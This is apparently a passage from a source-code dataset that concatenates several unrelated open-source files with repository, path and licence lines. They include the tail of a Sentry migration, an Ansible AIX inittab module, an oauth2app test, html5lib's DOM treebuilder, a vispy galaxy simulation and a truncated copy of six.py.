'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'project_set'", 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
| bsd-3-clause |
morinim/vita | src/examples/sr/csv2xrff.py | 1 | 3344 | #!/usr/bin/env python3
#
# Copyright (C) 2011 EOS di Manlio Morini.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/
#
import argparse
import csv
import os
from xml.etree.ElementTree import Element, ElementTree, SubElement
verbose = False
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def csv_to_xrff(args):
# Many tips for Element / SubElement manipulation in:
# <http://effbot.org/zone/element.htm#reading-and-writing-xml-files>
# Build the xrff skeleton.
xrff = Element("dataset", name=os.path.splitext(args.xrff_file)[0])
header = SubElement(xrff, "header")
body = SubElement(xrff, "body")
attributes = SubElement(header, "attributes")
instances = SubElement(body, "instances")
# Sniff the csv file dialect.
csv_file = open(args.csv_file, newline='')
dialect = csv.Sniffer().sniff(csv_file.read(1024))
csv_file.seek(0)
csv_reader = csv.reader(csv_file, dialect)
number = []
for i, row in enumerate(csv_reader):
instance = SubElement(instances, "instance")
for j, field in enumerate(row):
if i == 0:
if is_number(field):
arg_type = "numeric"
number.append(True)
else:
arg_type = "string"
number.append(False)
attribute = SubElement(attributes, "attribute", type=arg_type)
if j == args.class_column:
attribute.set("class", "yes")
value = SubElement(instance, "value")
if (number[j]):
value.text = field
else:
value.text = '"' + field + '"'
# Note that the standard element writer creates a compact output. There is
# no built-in support for pretty printing or user-defined namespace
# prefixes in the current version, so the output may not always be suitable
# for human consumption (to the extent XML is suitable for human
# consumption, that is).
# SOLUTION 1 (Unix)
# xmllint --format ugly.xml > pretty.xml
# SOLUTION 2
# from xml.etree.ElementTree import tostring
# def prettify(elem):
# rough_string = tostring(elem)
# reparsed = minidom.parseString(rough_string)
# return reparsed.toprettyxml(indent=" ")
# print prettify(xrff)
ElementTree(xrff).write(args.xrff_file)
def get_cmd_line_options():
description = "Convert a file from CSV data format to XRFF."
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-v", "--verbose", action="store_true",
help="Turn on verbose mode")
parser.add_argument("-c", "--class_column", type=int, default=0,
help="Which attribute should act as class attribute?")
parser.add_argument("csv_file")
parser.add_argument("xrff_file")
return parser
def main():
# Get argument flags and command options
parser = get_cmd_line_options()
args = parser.parse_args()
verbose = args.verbose
csv_to_xrff(args)
if __name__ == "__main__":
main()
| mpl-2.0 |
toshywoshy/ansible | lib/ansible/modules/system/aix_inittab.py | 43 | 7431 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Joris Weijters <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
author:
- Joris Weijters (@molekuul)
module: aix_inittab
short_description: Manages the inittab on AIX
description:
- Manages the inittab on AIX.
version_added: "2.3"
options:
name:
description:
- Name of the inittab entry.
type: str
required: yes
aliases: [ service ]
runlevel:
description:
- Runlevel of the entry.
type: str
required: yes
action:
description:
- Action what the init has to do with this entry.
type: str
required: yes
choices:
- boot
- bootwait
- hold
- initdefault
- 'off'
- once
- ondemand
- powerfail
- powerwait
- respawn
- sysinit
- wait
command:
description:
- What command has to run.
type: str
required: yes
insertafter:
description:
- After which inittabline should the new entry inserted.
type: str
state:
description:
- Whether the entry should be present or absent in the inittab file.
type: str
choices: [ absent, present ]
default: present
notes:
- The changes are persistent across reboots.
- You need root rights to read or adjust the inittab with the C(lsitab), C(chitab), C(mkitab) or C(rmitab) commands.
- Tested on AIX 7.1.
requirements:
- itertools
'''
EXAMPLES = '''
# Add service startmyservice to the inittab, directly after service existingservice.
- name: Add startmyservice to inittab
aix_inittab:
name: startmyservice
runlevel: 4
action: once
command: echo hello
insertafter: existingservice
state: present
become: yes
# Change inittab entry startmyservice to runlevel "2" and processaction "wait".
- name: Change startmyservice to inittab
aix_inittab:
name: startmyservice
runlevel: 2
action: wait
command: echo hello
state: present
become: yes
- name: Remove startmyservice from inittab
aix_inittab:
name: startmyservice
runlevel: 2
action: wait
command: echo hello
state: absent
become: yes
'''
RETURN = '''
name:
description: Name of the adjusted inittab entry
returned: always
type: str
sample: startmyservice
msg:
description: Action done with the inittab entry
returned: changed
type: str
sample: changed inittab entry startmyservice
changed:
description: Whether the inittab changed or not
returned: always
type: bool
sample: true
'''
# Import necessary libraries
try:
# python 2
from itertools import izip
except ImportError:
izip = zip
from ansible.module_utils.basic import AnsibleModule
# end import modules
# start defining the functions
def check_current_entry(module):
# Check if entry exists, if not return False in exists in return dict,
# if true return True and the entry in return dict
existsdict = {'exist': False}
lsitab = module.get_bin_path('lsitab')
(rc, out, err) = module.run_command([lsitab, module.params['name']])
if rc == 0:
keys = ('name', 'runlevel', 'action', 'command')
values = out.split(":")
# strip non readable characters as \n
values = map(lambda s: s.strip(), values)
existsdict = dict(izip(keys, values))
existsdict.update({'exist': True})
return existsdict
def main():
# initialize
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True, aliases=['service']),
runlevel=dict(type='str', required=True),
action=dict(type='str', choices=[
'boot',
'bootwait',
'hold',
'initdefault',
'off',
'once',
'ondemand',
'powerfail',
'powerwait',
'respawn',
'sysinit',
'wait',
]),
command=dict(type='str', required=True),
insertafter=dict(type='str'),
state=dict(type='str', default='present', choices=['absent', 'present']),
),
supports_check_mode=True,
)
result = {
'name': module.params['name'],
'changed': False,
'msg': ""
}
# Find commandline strings
mkitab = module.get_bin_path('mkitab')
rmitab = module.get_bin_path('rmitab')
chitab = module.get_bin_path('chitab')
rc = 0
# check if the new entry exists
current_entry = check_current_entry(module)
# if action is install or change,
if module.params['state'] == 'present':
# create new entry string
new_entry = module.params['name'] + ":" + module.params['runlevel'] + \
":" + module.params['action'] + ":" + module.params['command']
# If current entry exists or fields are different(if the entry does not
# exists, then the entry wil be created
if (not current_entry['exist']) or (
module.params['runlevel'] != current_entry['runlevel'] or
module.params['action'] != current_entry['action'] or
module.params['command'] != current_entry['command']):
# If the entry does exist then change the entry
if current_entry['exist']:
if not module.check_mode:
(rc, out, err) = module.run_command([chitab, new_entry])
if rc != 0:
module.fail_json(
msg="could not change inittab", rc=rc, err=err)
result['msg'] = "changed inittab entry" + " " + current_entry['name']
result['changed'] = True
# If the entry does not exist create the entry
elif not current_entry['exist']:
if module.params['insertafter']:
if not module.check_mode:
(rc, out, err) = module.run_command(
[mkitab, '-i', module.params['insertafter'], new_entry])
else:
if not module.check_mode:
(rc, out, err) = module.run_command(
[mkitab, new_entry])
if rc != 0:
module.fail_json(msg="could not adjust inittab", rc=rc, err=err)
result['msg'] = "add inittab entry" + " " + module.params['name']
result['changed'] = True
elif module.params['state'] == 'absent':
# If the action is remove and the entry exists then remove the entry
if current_entry['exist']:
if not module.check_mode:
(rc, out, err) = module.run_command(
[rmitab, module.params['name']])
if rc != 0:
module.fail_json(
msg="could not remove entry grom inittab)", rc=rc, err=err)
result['msg'] = "removed inittab entry" + " " + current_entry['name']
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
hiidef/oauth2app | tests/testsite/apps/api/tests/json.py | 4 | 1225 | #-*- coding: utf-8 -*-
try: import simplejson as json
except ImportError: import json
from .base import *
class JSONTestCase(BaseTestCase):
def test_00_email(self):
client = DjangoTestClient()
token = self.get_token()
# Sufficient scope.
response = client.get(
"/api/email_json",
{},
HTTP_AUTHORIZATION="Bearer %s" % token)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content)["email"], USER_EMAIL)
response = client.get(
"/api/email_json?callback=foo",
{},
HTTP_AUTHORIZATION="Bearer %s" % token)
self.assertEqual(response.status_code, 200)
# Remove the JSON callback.
content = response.content.replace("foo(", "").replace(");", "")
self.assertEqual(json.loads(content)["email"], USER_EMAIL)
response = client.get(
"/api/email_json?callback=foo",
{},
HTTP_AUTHORIZATION="Bearer !!!%s" % token)
content = response.content.replace("foo(", "").replace(");", "")
self.assertEqual(response.status_code, 200)
self.assertTrue("error" in json.loads(content))
| mit |
ademuk/django-oscar | sites/demo/apps/offers.py | 33 | 1268 | from oscar.apps.offer import models
class AlphabetRange(object):
name = "Products that start with D"
def contains_product(self, product):
return product.title.startswith('D')
def num_products(self):
return None
class BasketOwnerCalledBarry(models.Condition):
name = "User must be called barry"
class Meta:
proxy = True
def is_satisfied(self, basket):
if not basket.owner:
return False
return basket.owner.first_name.lower() == 'barry'
def can_apply_condition(self, product):
return False
def consume_items(self, basket, affected_lines):
return
class ChangesOwnerName(models.Benefit):
class Meta:
proxy = True
def apply(self, basket, condition, offer=None):
condition.consume_items(basket, ())
return models.PostOrderAction(
"You will have your name changed to Barry!")
def apply_deferred(self, basket, order, application):
if basket.owner:
basket.owner.first_name = "Barry"
basket.owner.save()
return "Name changed to Barry!"
return "We tried to apply benefit but couldn't"
@property
def description(self):
return "Changes owners name"
| bsd-3-clause |
mdublin/Brightcove-Dynamic-Ingest-App | ENV/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/dom.py | 920 | 8469 | from __future__ import absolute_import, division, unicode_literals
from xml.dom import minidom, Node
import weakref
from . import _base
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
def getDomBuilder(DomImplementation):
Dom = DomImplementation
class AttrList(object):
def __init__(self, element):
self.element = element
def __iter__(self):
return list(self.element.attributes.items()).__iter__()
def __setitem__(self, name, value):
self.element.setAttribute(name, value)
def __len__(self):
return len(list(self.element.attributes.items()))
def items(self):
return [(item[0], item[1]) for item in
list(self.element.attributes.items())]
def keys(self):
return list(self.element.attributes.keys())
def __getitem__(self, name):
return self.element.getAttribute(name)
def __contains__(self, name):
if isinstance(name, tuple):
raise NotImplementedError
else:
return self.element.hasAttribute(name)
class NodeBuilder(_base.Node):
def __init__(self, element):
_base.Node.__init__(self, element.nodeName)
self.element = element
namespace = property(lambda self: hasattr(self.element, "namespaceURI")
and self.element.namespaceURI or None)
def appendChild(self, node):
node.parent = self
self.element.appendChild(node.element)
def insertText(self, data, insertBefore=None):
text = self.element.ownerDocument.createTextNode(data)
if insertBefore:
self.element.insertBefore(text, insertBefore.element)
else:
self.element.appendChild(text)
def insertBefore(self, node, refNode):
self.element.insertBefore(node.element, refNode.element)
node.parent = self
def removeChild(self, node):
if node.element.parentNode == self.element:
self.element.removeChild(node.element)
node.parent = None
def reparentChildren(self, newParent):
while self.element.hasChildNodes():
child = self.element.firstChild
self.element.removeChild(child)
newParent.element.appendChild(child)
self.childNodes = []
def getAttributes(self):
return AttrList(self.element)
def setAttributes(self, attributes):
if attributes:
for name, value in list(attributes.items()):
if isinstance(name, tuple):
if name[0] is not None:
qualifiedName = (name[0] + ":" + name[1])
else:
qualifiedName = name[1]
self.element.setAttributeNS(name[2], qualifiedName,
value)
else:
self.element.setAttribute(
name, value)
attributes = property(getAttributes, setAttributes)
def cloneNode(self):
return NodeBuilder(self.element.cloneNode(False))
def hasContent(self):
return self.element.hasChildNodes()
def getNameTuple(self):
if self.namespace is None:
return namespaces["html"], self.name
else:
return self.namespace, self.name
nameTuple = property(getNameTuple)
class TreeBuilder(_base.TreeBuilder):
def documentClass(self):
self.dom = Dom.getDOMImplementation().createDocument(None, None, None)
return weakref.proxy(self)
def insertDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
domimpl = Dom.getDOMImplementation()
doctype = domimpl.createDocumentType(name, publicId, systemId)
self.document.appendChild(NodeBuilder(doctype))
if Dom == minidom:
doctype.ownerDocument = self.dom
def elementClass(self, name, namespace=None):
if namespace is None and self.defaultNamespace is None:
node = self.dom.createElement(name)
else:
node = self.dom.createElementNS(namespace, name)
return NodeBuilder(node)
def commentClass(self, data):
return NodeBuilder(self.dom.createComment(data))
def fragmentClass(self):
return NodeBuilder(self.dom.createDocumentFragment())
def appendChild(self, node):
self.dom.appendChild(node.element)
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
return self.dom
def getFragment(self):
return _base.TreeBuilder.getFragment(self).element
def insertText(self, data, parent=None):
data = data
if parent != self:
_base.TreeBuilder.insertText(self, data, parent)
else:
# HACK: allow text nodes as children of the document node
if hasattr(self.dom, '_child_node_types'):
if Node.TEXT_NODE not in self.dom._child_node_types:
self.dom._child_node_types = list(self.dom._child_node_types)
self.dom._child_node_types.append(Node.TEXT_NODE)
self.dom.appendChild(self.dom.createTextNode(data))
implementation = DomImplementation
name = None
def testSerializer(element):
element.normalize()
rv = []
def serializeElement(element, indent=0):
if element.nodeType == Node.DOCUMENT_TYPE_NODE:
if element.name:
if element.publicId or element.systemId:
publicId = element.publicId or ""
systemId = element.systemId or ""
rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" %
(' ' * indent, element.name, publicId, systemId))
else:
rv.append("|%s<!DOCTYPE %s>" % (' ' * indent, element.name))
else:
rv.append("|%s<!DOCTYPE >" % (' ' * indent,))
elif element.nodeType == Node.DOCUMENT_NODE:
rv.append("#document")
elif element.nodeType == Node.DOCUMENT_FRAGMENT_NODE:
rv.append("#document-fragment")
elif element.nodeType == Node.COMMENT_NODE:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.nodeValue))
elif element.nodeType == Node.TEXT_NODE:
rv.append("|%s\"%s\"" % (' ' * indent, element.nodeValue))
else:
if (hasattr(element, "namespaceURI") and
element.namespaceURI is not None):
name = "%s %s" % (constants.prefixes[element.namespaceURI],
element.nodeName)
else:
name = element.nodeName
rv.append("|%s<%s>" % (' ' * indent, name))
if element.hasAttributes():
attributes = []
for i in range(len(element.attributes)):
attr = element.attributes.item(i)
name = attr.nodeName
value = attr.value
ns = attr.namespaceURI
if ns:
name = "%s %s" % (constants.prefixes[ns], attr.localName)
else:
name = attr.nodeName
attributes.append((name, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
indent += 2
for child in element.childNodes:
serializeElement(child, indent)
serializeElement(element, 0)
return "\n".join(rv)
return locals()
# The actual means to get a module!
getDomModule = moduleFactoryFactory(getDomBuilder)
| mit |
drufat/vispy | examples/demo/gloo/galaxy/galaxy_simulation.py | 18 | 7753 | # -*- coding: utf-8 -*-
# vispy: testskip
# -----------------------------------------------------------------------------
# A Galaxy Simulator based on the density wave theory
# (c) 2012 Ingo Berg
#
# Simulating a Galaxy with the density wave theory
# http://beltoforion.de/galaxy/galaxy_en.html
#
# Python version(c) 2014 Nicolas P.Rougier
# -----------------------------------------------------------------------------
import math
import numpy as np
class Galaxy(object):
""" Galaxy simulation using the density wave theory """
def __init__(self, n=20000):
""" Initialize galaxy """
# Eccentricity of the innermost ellipse
self._inner_eccentricity = 0.8
# Eccentricity of the outermost ellipse
self._outer_eccentricity = 1.0
# Velocity at the innermost core in km/s
self._center_velocity = 30
# Velocity at the core edge in km/s
self._inner_velocity = 200
# Velocity at the edge of the disk in km/s
self._outer_velocity = 300
# Angular offset per parsec
self._angular_offset = 0.019
# Inner core radius
self._core_radius = 6000
# Galaxy radius
self._galaxy_radius = 15000
# The radius after which all density waves must have circular shape
self._distant_radius = 0
# Distribution of stars
self._star_distribution = 0.45
# Angular velocity of the density waves
self._angular_velocity = 0.000001
# Number of stars
self._stars_count = n
# Number of dust particles
self._dust_count = int(self._stars_count * 0.75)
# Number of H-II regions
self._h2_count = 200
# Particles
dtype = [('theta', np.float32, 1),
('velocity', np.float32, 1),
('angle', np.float32, 1),
('m_a', np.float32, 1),
('m_b', np.float32, 1),
('size', np.float32, 1),
('type', np.float32, 1),
('temperature', np.float32, 1),
('brightness', np.float32, 1),
('position', np.float32, 2)]
n = self._stars_count + self._dust_count + 2*self._h2_count
self._particles = np.zeros(n, dtype=dtype)
i0 = 0
i1 = i0 + self._stars_count
self._stars = self._particles[i0:i1]
self._stars['size'] = 3.
self._stars['type'] = 0
i0 = i1
i1 = i0 + self._dust_count
self._dust = self._particles[i0:i1]
self._dust['size'] = 64
self._dust['type'] = 1
i0 = i1
i1 = i0 + self._h2_count
self._h2a = self._particles[i0:i1]
self._h2a['size'] = 0
self._h2a['type'] = 2
i0 = i1
i1 = i0 + self._h2_count
self._h2b = self._particles[i0:i1]
self._h2b['size'] = 0
self._h2b['type'] = 3
def __len__(self):
""" Number of particles """
if self._particles is not None:
return len(self._particles)
return 0
def __getitem__(self, key):
""" x.__getitem__(y) <==> x[y] """
if self._particles is not None:
return self._particles[key]
return None
def reset(self, rad, radCore, deltaAng,
ex1, ex2, sigma, velInner, velOuter):
# Initialize parameters
# ---------------------
self._inner_eccentricity = ex1
self._outer_eccentricity = ex2
self._inner_velocity = velInner
self._outer_velocity = velOuter
self._angular_offset = deltaAng
self._core_radius = radCore
self._galaxy_radius = rad
self._distant_radius = self._galaxy_radius * 2
self.m_sigma = sigma
# Initialize stars
# ----------------
stars = self._stars
R = np.random.normal(0, sigma, len(stars)) * self._galaxy_radius
stars['m_a'] = R
stars['angle'] = 90 - R * self._angular_offset
stars['theta'] = np.random.uniform(0, 360, len(stars))
stars['temperature'] = np.random.uniform(3000, 9000, len(stars))
stars['brightness'] = np.random.uniform(0.05, 0.25, len(stars))
stars['velocity'] = 0.000005
for i in range(len(stars)):
stars['m_b'][i] = R[i] * self.eccentricity(R[i])
# Initialize dust
# ---------------
dust = self._dust
X = np.random.uniform(0, 2*self._galaxy_radius, len(dust))
Y = np.random.uniform(-self._galaxy_radius, self._galaxy_radius,
len(dust))
R = np.sqrt(X*X+Y*Y)
dust['m_a'] = R
dust['angle'] = R * self._angular_offset
dust['theta'] = np.random.uniform(0, 360, len(dust))
dust['velocity'] = 0.000005
dust['temperature'] = 6000 + R/4
dust['brightness'] = np.random.uniform(0.01, 0.02)
for i in range(len(dust)):
dust['m_b'][i] = R[i] * self.eccentricity(R[i])
# Initialise H-II
# ---------------
h2a, h2b = self._h2a, self._h2b
X = np.random.uniform(-self._galaxy_radius, self._galaxy_radius,
len(h2a))
Y = np.random.uniform(-self._galaxy_radius, self._galaxy_radius,
len(h2a))
R = np.sqrt(X*X+Y*Y)
h2a['m_a'] = R
h2b['m_a'] = R + 1000
h2a['angle'] = R * self._angular_offset
h2b['angle'] = h2a['angle']
h2a['theta'] = np.random.uniform(0, 360, len(h2a))
h2b['theta'] = h2a['theta']
h2a['velocity'] = 0.000005
h2b['velocity'] = 0.000005
h2a['temperature'] = np.random.uniform(3000, 9000, len(h2a))
h2b['temperature'] = h2a['temperature']
h2a['brightness'] = np.random.uniform(0.005, 0.010, len(h2a))
h2b['brightness'] = h2a['brightness']
for i in range(len(h2a)):
h2a['m_b'][i] = R[i] * self.eccentricity(R[i])
h2b['m_b'] = h2a['m_b']
def update(self, timestep=100000):
""" Update simulation """
self._particles['theta'] += self._particles['velocity'] * timestep
P = self._particles
a, b = P['m_a'], P['m_b']
theta, beta = P['theta'], -P['angle']
alpha = theta * math.pi / 180.0
cos_alpha = np.cos(alpha)
sin_alpha = np.sin(alpha)
cos_beta = np.cos(beta)
sin_beta = np.sin(beta)
P['position'][:, 0] = a*cos_alpha*cos_beta - b*sin_alpha*sin_beta
P['position'][:, 1] = a*cos_alpha*sin_beta + b*sin_alpha*cos_beta
D = np.sqrt(((self._h2a['position'] -
self._h2b['position'])**2).sum(axis=1))
S = np.maximum(1, ((1000-D)/10) - 50)
self._h2a['size'] = 2.0*S
self._h2b['size'] = S/6.0
def eccentricity(self, r):
# Core region of the galaxy. Innermost part is round
# eccentricity increasing linear to the border of the core.
if r < self._core_radius:
return 1 + (r / self._core_radius) * (self._inner_eccentricity-1)
elif r > self._core_radius and r <= self._galaxy_radius:
a = self._galaxy_radius - self._core_radius
b = self._outer_eccentricity - self._inner_eccentricity
return self._inner_eccentricity + (r - self._core_radius) / a * b
# Eccentricity is slowly reduced to 1.
elif r > self._galaxy_radius and r < self._distant_radius:
a = self._distant_radius - self._galaxy_radius
b = 1 - self._outer_eccentricity
return self._outer_eccentricity + (r - self._galaxy_radius) / a * b
else:
return 1
| bsd-3-clause |
smistad/FAST | source/FAST/Examples/Python/extract_surface_mesh.py | 1 | 1229 | ## @example extract_surface_mesh.py
# This examples extract a surface mesh with over 3 million triangles from a CT volume
# using the Marching Cubes algorithm.
# It also shows how you can access the vertex and triangle data directly.
import fast
importer = fast.ImageFileImporter.New()
importer.setFilename(fast.Config.getTestDataPath() + "/CT/CT-Abdomen.mhd")
extraction = fast.SurfaceExtraction.New()
extraction.setInputConnection(importer.getOutputPort())
extraction.setThreshold(300)
mesh = extraction.updateAndGetOutputMesh()
access = mesh.getMeshAccess(fast.ACCESS_READ)
# Get size of mesh:
print('Mesh size (vertices, triangles)', mesh.getNrOfVertices(), mesh.getNrOfTriangles())
# Get the position of first vertex
print(access.getVertex(0).getPosition())
# Get endpoints (vertex indices) of triangle 0
print(access.getTriangle(0).getEndpoint1(), access.getTriangle(0).getEndpoint2(), access.getTriangle(0).getEndpoint3())
# Get all vertices and triangles as lists, this is slow if it is a big surface:
#vertices = access.getVertices()
#triangles = access.getTriangles()
renderer = fast.TriangleRenderer.New()
renderer.setInputData(mesh)
window = fast.SimpleWindow.New()
window.addRenderer(renderer)
window.start()
| bsd-2-clause |
shermanng10/superathletebuilder | env/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/packages/six.py | 2375 | 11628 | """Utilities for writing code that runs on Python 2 and 3"""
#Copyright (c) 2010-2011 Benjamin Peterson
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.2.0" # Revision 41c74fef2ded
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
